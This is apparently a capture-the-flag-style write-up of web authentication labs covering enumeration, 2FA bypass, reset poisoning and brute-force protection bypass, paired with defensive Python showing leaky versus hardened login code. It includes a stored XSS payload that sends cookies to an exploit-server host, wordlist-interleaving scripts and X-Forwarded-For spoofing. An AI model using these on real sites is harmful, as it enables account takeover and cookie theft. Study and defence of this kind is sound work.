Username enumeration via different responses

[screenshot]

Try logging in

[screenshots]

Add these usernames

[screenshots]

Change the username

[screenshots]

2FA simple bypass

[screenshots]

Log in with wiener

[screenshot]

Found that there is also a verification code step

[screenshot]

Our email address can be seen

[screenshot]

Try logging in as carlos

Go straight to /my-account

[screenshot]

Password reset broken logic

[screenshots]

There is a password reset

Here we try to reset wiener's password

[screenshots]

Found that an email was sent

[screenshots]

Try changing carlos's password

[screenshot]

Username enumeration via subtly different responses

[screenshots]

Sort the results and the problem shows up

[screenshots]

Username enumeration via response timing

[screenshot]

Try logging in

[screenshot]

Found that a successful login redirects straight away

[screenshot]

But when the username is wrong the wait is longer

[screenshot]

Same when the password is wrong

[screenshot]

But when trying to brute force, found that the IP was blocked

[screenshot]

Try adding an XFF header

[screenshots]

In Columns, select the Response received and Response completed options

[screenshots]

Can see that this username has a noticeably longer response time

[screenshots]

Can see it is always this one

[screenshots]

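The three enumeration labs above (different responses, subtly different responses, response timing) all come down to one thing: the login handler's error text or run time depends on whether the username exists. The Python below is an added example and not the lab's code. It puts a lab-style leaky handler next to a hardened one that returns a single message and does the same hashing work for unknown users, plus a small timer for eyeballing the gap. The user table, the messages, the PBKDF2 iteration count and the function names are all constructed for the demo.

```python
import hashlib
import hmac
import secrets
import statistics
import time

# Constructed demo credentials (not the lab's user table); a real store keeps
# only salted hashes.  The iteration count is a demo value; production
# deployments use far higher PBKDF2 counts or a memory-hard KDF.
ITERATIONS = 60_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


_SALT = secrets.token_bytes(16)
USERS = {"wiener": (_SALT, _hash_password("peter", _SALT))}

# A dummy credential that unknown usernames are checked against, so the
# unknown-user path costs the same as the known-user path.
_DUMMY_SALT = secrets.token_bytes(16)
_DUMMY_HASH = _hash_password(secrets.token_hex(16), _DUMMY_SALT)


def login_leaky(username: str, password: str):
    """Lab-style behaviour: distinct messages, and an early return that skips
    the hash for unknown users (fast path vs slow path)."""
    if username not in USERS:
        return 200, "Invalid username"
    salt, stored = USERS[username]
    if _hash_password(password, salt) != stored:
        return 200, "Incorrect password"
    return 302, "/my-account"


def login_hardened(username: str, password: str):
    """One message and one amount of work whether or not the username exists."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    match = hmac.compare_digest(_hash_password(password, salt), stored)
    # Only honour the match when the username really exists; the dummy hash
    # can never match because nobody knows the random password behind it.
    if match and username in USERS:
        return 302, "/my-account"
    return 200, "Invalid username or password."


def median_ms(fn, username: str, password: str, rounds: int = 5) -> float:
    """Median wall-clock time of `fn` over `rounds` calls, in milliseconds."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter()
        fn(username, password)
        samples.append((time.perf_counter() - t0) * 1000)
    return statistics.median(samples)


if __name__ == "__main__":
    # The leaky handler answers unknown users almost instantly; the hardened
    # one takes roughly the same time in both cases.
    for fn in (login_leaky, login_hardened):
        print(fn.__name__,
              "unknown user: %.1f ms" % median_ms(fn, "nobody", "x"),
              "known user: %.1f ms" % median_ms(fn, "wiener", "x"))
```

The dummy-hash trick is what closes the timing channel: the unknown-user branch must run the same KDF, not merely return the same string. The message text alone fixes the first two labs; the equal work fixes the third.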
Breaking brute-force protection, IP block

[screenshot]

Found that three consecutive failed logins lock it out

[screenshot]

But every successful login resets the count

Try interleaving the candidate passwords with peter

    # Rewrite passwd.txt so that every candidate password is followed by "peter"
    with open('passwd.txt', 'r') as f:
        s = f.read()
    with open('passwd.txt', 'w') as f2:
        end = s.replace("\n", "\npeter\n")
        f2.write(end)
    # Build a matching user list that alternates carlos and wiener
    with open('user.txt', 'w') as f3:
        for i in range(1, 100):
            f3.write('carlos\nwiener\n')

[screenshots]

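Two weaknesses are in play in the IP-block labs above: the counter is keyed on a client-supplied X-Forwarded-For value, and any successful login clears it, which is what the interleaved peter logins use. The Python below is an added example, not the labs' code. It shows a lab-style limiter beside a hardened one that trusts X-Forwarded-For only when the TCP peer is a known proxy, keeps a counter per account and per client address, resets only the account that actually logged in, and lets locks expire on the clock. The proxy address 10.0.0.1, the thresholds and the class names are constructed.

```python
import ipaddress
import time
from collections import defaultdict

TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.1")}   # constructed: our own reverse proxy
MAX_FAILURES = 3
LOCK_SECONDS = 60


def client_ip(peer_ip, xff):
    """Use X-Forwarded-For only when the TCP peer is a trusted proxy, and then
    the hop that proxy appended (the last value), never the client-supplied first one."""
    peer = ipaddress.ip_address(peer_ip)
    if xff and peer in TRUSTED_PROXIES:
        hops = [h.strip() for h in xff.split(",") if h.strip()]
        try:
            return str(ipaddress.ip_address(hops[-1]))
        except (IndexError, ValueError):
            pass
    return str(peer)


class LeakyLimiter:
    """Lab-style protection: counter keyed on whatever X-Forwarded-For says,
    and cleared by any successful login from that key."""

    def __init__(self):
        self.failures = defaultdict(int)

    def _key(self, peer_ip, xff):
        return (xff or peer_ip).split(",")[0].strip()

    def allowed(self, peer_ip, xff):
        return self.failures[self._key(peer_ip, xff)] < MAX_FAILURES

    def record(self, peer_ip, xff, success):
        key = self._key(peer_ip, xff)
        self.failures[key] = 0 if success else self.failures[key] + 1


class HardenedLimiter:
    """Per-account and per-client counters; a success resets only that account's
    counter, and locks expire on the clock rather than on a later success."""

    def __init__(self, now=time.monotonic):
        self.now = now
        self.accounts = defaultdict(lambda: [0, 0.0])   # username -> [failures, locked_until]
        self.clients = defaultdict(lambda: [0, 0.0])    # client ip -> [failures, locked_until]

    def _locked(self, entry):
        return entry[1] > self.now()

    def allowed(self, peer_ip, xff, username):
        ip = client_ip(peer_ip, xff)
        return not (self._locked(self.accounts[username]) or self._locked(self.clients[ip]))

    def record(self, peer_ip, xff, username, success):
        account = self.accounts[username]
        if success:
            account[0] = 0          # only this account's counter is cleared
            return
        for entry in (account, self.clients[client_ip(peer_ip, xff)]):
            entry[0] += 1
            if entry[0] >= MAX_FAILURES:
                entry[0] = 0
                entry[1] = self.now() + LOCK_SECONDS
```

With the hardened limiter the interleaving trick stops working: a wiener login from the same address resets wiener's counter and nothing else, and the third carlos failure locks both carlos and the address until the timer runs out. The `now` parameter is injectable so the lock expiry can be tested without sleeping.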
Username enumeration via account lock

[screenshots]

The purpose here is to add an empty (null) payload

[screenshots]

2FA broken logic

[screenshots]

Logging in also triggers the verification code

[screenshot]

It is numeric, so brute force may be possible

[screenshots]

Try brute forcing

[screenshots]

Brute-forcing the stay-logged-in cookie

[screenshots]

Can see there is a Stay logged in option

[screenshot]

Here a Set-Cookie is returned

[screenshot]

Can see that what follows the colon is the MD5 of the password

[screenshots]

Offline password cracking

[screenshots]

Much the same idea, but this time offline

[screenshot]

There is stored XSS

<script>document.location='//exploit-0ad600d6044fab3dc5fc4018016d00b4.exploit-server.net/'+document.cookie</script>

[screenshots]

onceuponatime

[screenshot]

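Both the stay-logged-in lab and the offline cracking lab rest on the same cookie design: base64 of the username, a colon, and an unsalted MD5 of the password, which is reversible and crackable once stolen (here via the stored XSS). The Python below is an added example, not the labs' code. It reconstructs the weak format to show what it gives away, then shows the usual replacement: a random opaque token whose hash is stored server-side with an expiry, revoked on logout or password change, and sent with HttpOnly, Secure and SameSite attributes so script cannot read it. The cookie name, lifetime and function names are constructed.

```python
import base64
import hashlib
import secrets
import time

REMEMBER_TTL = 30 * 24 * 3600           # constructed 30-day lifetime
_remember = {}                           # sha256(token) -> {"user": ..., "expires": ...}


def weak_digest(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def weak_cookie(username: str, password: str) -> str:
    """Lab-style value: base64(username + ':' + md5(password)).  It is
    deterministic, carries the username in clear, and the unsalted MD5 can be
    attacked offline with nothing but a wordlist."""
    return base64.b64encode(f"{username}:{weak_digest(password)}".encode()).decode()


def inspect_weak_cookie(cookie: str):
    """Decode the lab-style value to show what anyone holding it learns."""
    username, digest = base64.b64decode(cookie).decode().split(":", 1)
    return username, digest


def _lookup_key(token: str) -> str:
    # Store a hash of the token so a leaked table does not yield usable cookies.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_remember_token(username: str, now=None) -> str:
    """Hardened: a random token that says nothing about the user or password."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _remember[_lookup_key(token)] = {"user": username, "expires": now + REMEMBER_TTL}
    return token


def resolve_remember_token(token: str, now=None):
    """Return the username for a live token, or None; expired tokens are dropped."""
    now = time.time() if now is None else now
    key = _lookup_key(token)
    record = _remember.get(key)
    if record is None:
        return None
    if record["expires"] <= now:
        del _remember[key]
        return None
    return record["user"]


def revoke_remember_tokens(username: str) -> int:
    """Call on logout and on password change so old devices lose access."""
    stale = [k for k, r in _remember.items() if r["user"] == username]
    for k in stale:
        del _remember[k]
    return len(stale)


def set_cookie_header(token: str) -> str:
    """HttpOnly keeps document.cookie (and so the XSS above) from reading it."""
    return (f"stay-logged-in={token}; Path=/; Max-Age={REMEMBER_TTL}; "
            "HttpOnly; Secure; SameSite=Lax")
```

The point of hashing the token before storing it is that the database row is useless on its own; the point of the random token is that there is nothing to crack offline even if the cookie itself leaks.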
Password reset poisoning via middleware

[screenshot]

The X-Forwarded-Host header: if the browser sends a request to the proxy server with a Host header value of example.com, the proxy server rewrites the Host header to its own hostname and adds an "X-Forwarded-Host: example.com" header.

[screenshot]

Found the token

[screenshot]

Log in as wiener

[screenshots]

Replace the token

[screenshots]

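The poisoning lab works because the reset link's host is copied from a request header, and the earlier "password reset broken logic" lab works because the token is never actually tied to the account being changed. The Python below is an added example, not the labs' code, covering both: the link is built from a configured origin rather than Host or X-Forwarded-Host, and the account to reset comes from the token record, which is single-use and expires. The origin shop.example, the query parameter name `token`, the lifetime and the user store are all constructed.

```python
import hashlib
import secrets
from urllib.parse import urlencode

CANONICAL_ORIGIN = "https://shop.example"   # constructed: configured once, never read from the request
RESET_TTL = 15 * 60
_reset_tokens = {}                           # sha256(token) -> (username, expires)


def reset_link_leaky(headers: dict, token: str) -> str:
    """Lab-style behaviour: the link's host is whatever X-Forwarded-Host
    (or Host) says, so a poisoned header lands in the victim's email."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/forgot-password?token={token}"


def reset_link_hardened(token: str) -> str:
    """The link is built from configuration; request headers cannot steer it."""
    return f"{CANONICAL_ORIGIN}/forgot-password?" + urlencode({"token": token})


def _key(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def create_reset_token(username: str, now: float) -> str:
    token = secrets.token_urlsafe(32)
    _reset_tokens[_key(token)] = (username, now + RESET_TTL)
    return token


def complete_reset_leaky(token, submitted_username, new_password, users):
    """Lab-style 'broken logic': the token is not checked at all and the
    username field in the form decides which account gets the new password."""
    users[submitted_username] = new_password
    return submitted_username


def complete_reset_hardened(token, submitted_username, new_password, users, now):
    """The account comes from the token record; the token is single-use and
    expires; a form username that does not match the record is rejected."""
    if not token:
        return None
    record = _reset_tokens.pop(_key(token), None)    # consumed on first use, match or not
    if record is None:
        return None
    username, expires = record
    if now > expires or submitted_username != username:
        return None
    users[username] = new_password
    return username
```

`users` is a constructed plaintext dict purely so the test can see which account changed; a real store holds salted hashes. Consuming the token even on a mismatched username is deliberate: a token that has been presented with the wrong account name should not stay valid.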
Password brute force via password change

[screenshots]

There is a change-password option

[screenshot]

If the current password is incorrect and the two new passwords differ, it shows Current password is incorrect

[screenshot]

Whereas if the current password is correct and the two new passwords differ, it shows New passwords do not match

[screenshots]

Broken brute-force protection, multiple credentials per request

[screenshot]

    # Join the candidate passwords into one JSON-array-style string: p1","p2","p3
    with open('passwd.txt', 'r') as f:
        s = f.read()
    with open('passwd.txt', 'w') as f2:
        end = s.replace("\n", '","')
        f2.write(end)

[screenshots]

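The change-password lab leaks through message ordering (the current password is verified before the two new passwords are compared), and the multiple-credentials lab leaks because the JSON login accepts an array where a string was expected. The Python below is an added example, not the labs' code. It shows strict credential parsing that admits exactly one string per field, a lab-style versus hardened login, and a change-password handler that takes the account from the session, runs the cheap comparison first so the message reveals nothing about the current password, and counts wrong attempts per account. The user store, messages, limits and function names are constructed.

```python
import json
from collections import defaultdict

USERS = {"carlos": "c-pass", "wiener": "peter"}   # constructed plaintext store, for brevity only
MAX_PASSWORD_LEN = 256
MAX_CHANGE_ATTEMPTS = 3
_change_failures = defaultdict(int)


def parse_credentials(raw_body: str):
    """Accept exactly one string username and one string password; anything else is rejected."""
    try:
        body = json.loads(raw_body)
    except (json.JSONDecodeError, TypeError):
        return None
    if not isinstance(body, dict):
        return None
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    if len(password) > MAX_PASSWORD_LEN:       # bound the work one request can cause
        return None
    return username, password


def login_leaky(raw_body: str) -> bool:
    """Lab-style handler: a list in the password field is accepted and any
    member that matches logs in, so one request tests a whole wordlist and
    the per-request counter never trips."""
    body = json.loads(raw_body)
    password = body.get("password")
    candidates = password if isinstance(password, list) else [password]
    stored = USERS.get(body.get("username"))
    return stored is not None and any(c == stored for c in candidates)


def login_hardened(raw_body: str) -> bool:
    creds = parse_credentials(raw_body)
    if creds is None:
        return False
    username, password = creds
    return USERS.get(username) == password


def change_password_leaky(username, current, new1, new2):
    """Lab-style: the target account comes from the form, and the current
    password is checked before the new passwords are compared, so the message
    reveals whether `current` was right even when the form is incomplete."""
    if USERS.get(username) != current:
        return "Current password is incorrect"
    if new1 != new2:
        return "New passwords do not match"
    USERS[username] = new1
    return "Password changed"


def change_password_hardened(session_user, current, new1, new2):
    """The account is the logged-in session's, the cheap check runs first,
    and wrong current passwords are counted per account."""
    if new1 != new2:
        return "New passwords do not match"
    if _change_failures[session_user] >= MAX_CHANGE_ATTEMPTS:
        return "Too many attempts; log in again later"
    if USERS.get(session_user) != current:
        _change_failures[session_user] += 1
        return "Current password is incorrect"
    _change_failures[session_user] = 0
    USERS[session_user] = new1
    return "Password changed"
```

Type-checking the password field is the whole fix for the array trick: a JSON schema check at the edge would do the same. Reordering the comparisons means a mismatched pair of new passwords always yields the same message, so the change form no longer doubles as a password oracle.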
Bypassing 2FA with brute force

[screenshots]

The aim is that for every request these three requests are executed

[screenshots]
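The three 2FA labs in this write-up fail in three different places: the simple bypass treats a passed password step as a full login, the broken-logic lab takes the account being verified from a client-controlled value, and the brute-force lab lets a session macro restart the code step as often as needed. The Python below is an added example, not the labs' code. It models the login as a session state machine in which /my-account needs both steps, the code is bound to the session's user, each code allows a few guesses, and wrong guesses are also counted per account across re-logins. The user store, limits, status strings and names are constructed; the `rng` parameter exists only so the test can fix the code.

```python
import hmac
import secrets

USERS = {"carlos": "c-pass"}       # constructed plaintext store, for brevity only
MFA_ATTEMPTS_PER_CODE = 3          # wrong guesses before the code is discarded
MFA_ATTEMPTS_PER_ACCOUNT = 9       # cumulative wrong guesses before the account is locked
MFA_TTL = 300
_account_failures = {}


class Session:
    def __init__(self):
        self.user = None           # set after the password step
        self.mfa_done = False      # set only after the code step
        self.code = None
        self.attempts = 0
        self.expires = 0.0


def password_step(session, username, password, now, rng=secrets.randbelow):
    """First factor.  On success the session is 'pending': it knows the user
    but is not logged in, and a fresh code is generated for that user only."""
    if USERS.get(username) != password:
        return False
    if _account_failures.get(username, 0) >= MFA_ATTEMPTS_PER_ACCOUNT:
        return False               # account locked; re-logging in does not help
    session.user = username
    session.mfa_done = False
    session.code = f"{rng(10_000):04d}"   # delivered out of band, never to the client
    session.attempts = 0
    session.expires = now + MFA_TTL
    return True


def mfa_step_leaky(session, verify_user, submitted_code, codes_by_user):
    """Lab-style 'broken logic': the account being verified comes from a
    client-controlled 'verify' value, not from the session that passed the
    password step, so any session can complete any user's second factor."""
    if codes_by_user.get(verify_user) == submitted_code:
        session.user = verify_user
        session.mfa_done = True
        return "ok"
    return "wrong"


def mfa_step_hardened(session, submitted_code, now):
    """Second factor bound to session.user, with bounded attempts per code and per account."""
    if session.user is None or session.code is None:
        return "no-login"
    if now > session.expires:
        session.code = None
        return "expired"
    if session.attempts >= MFA_ATTEMPTS_PER_CODE:
        session.code = None
        session.user = None        # back to the start; a new password step is required
        return "locked"
    session.attempts += 1
    if hmac.compare_digest(session.code, submitted_code):
        session.mfa_done = True
        session.code = None
        _account_failures[session.user] = 0
        return "ok"
    _account_failures[session.user] = _account_failures.get(session.user, 0) + 1
    return "wrong"


def my_account_leaky(session) -> bool:
    """Lab-style 'simple bypass': passing the password step counts as logged in."""
    return session.user is not None


def my_account_hardened(session) -> bool:
    return session.user is not None and session.mfa_done
```

The per-account counter is what defeats the macro approach: re-running the login to get a fresh code still adds to the same tally, so after a bounded number of wrong guesses the password step itself stops issuing codes.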